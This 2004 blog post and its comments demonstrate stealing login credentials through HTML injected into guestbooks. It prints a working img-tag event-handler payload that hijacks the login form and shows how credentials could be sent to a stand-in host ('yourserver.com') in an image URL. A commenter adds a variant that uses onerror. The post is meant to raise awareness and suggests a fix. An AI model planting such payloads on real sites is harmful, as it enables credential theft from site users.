I looked arround in the web to find websites with security lecks. After months there is no change to the webmasters, they still offer login textboxes side-by-side to guestbooks or weblogs. Some weeks ago I posted a sample on how to allow javascript execution on websites with a mouseover. But this was not very good...

Today, I will show code that allows you to get username and password from pages that have the login form on the same page as the guestbook. The following code can be added to a guestbook or a weblog if the accept html code, the do not have to allow <SCRIPT> tags:

<img src="/trans.gif" onreadystatechange="document.forms[0].onsubmit=new Function('alert(\'Website hacked: \'+document.forms[0].username.value+\'|\'+document.forms[0].password.value);');" width=1 height=1>

Now, if the page will be shown the onreadystatechange event will be fired (Note: the trans.gif must be available on this website, can be replaced by any other image!). We add a new function to the event handler submit. If you click on submit (will be login) a message box will appear showing your credentials. It is very easy to load a second image from your server with the credentials as additional arguments like http://yourserver.com/image.gif?username=xx&password=yy, so you have everything you want.

I have created this small script to show you how easy it still is to get user credentials.

To be secure put the login form to a seperate page!!!

If you need assistence to prevent such security lecks go to http://www.schwarz-interactive.de to get help.

4 Comments

• Phil Scott said Tuesday, April 6, 2004 9:47:00 PM

  Of course, you could encode the messages so that it isn't interpretted as html, which you should be doing anyways on a guestbook or something similiar (ie this comments box)

• Jerry Pisk said Tuesday, April 6, 2004 9:56:00 PM

  But a lot of forums do not encode, and allow [some] html tags to be included.
  
  Btw if you want to be safe and use an image that doesn't exist just use the onerror event handler.

• Phil Scott said Tuesday, April 6, 2004 10:04:00 PM

  If a forum doesn't know enough to encode, i doubt if they've ever even began to think about cross site scripting attacks :)

• Michael Schwarz said Wednesday, April 7, 2004 4:56:00 AM

  @Phil Scott: Yes, you can encode your messages, but sometimes you want to allow html fragments. I would say if you filter the message that there is no SCRIPT tag and all events are destroyed it can be safe.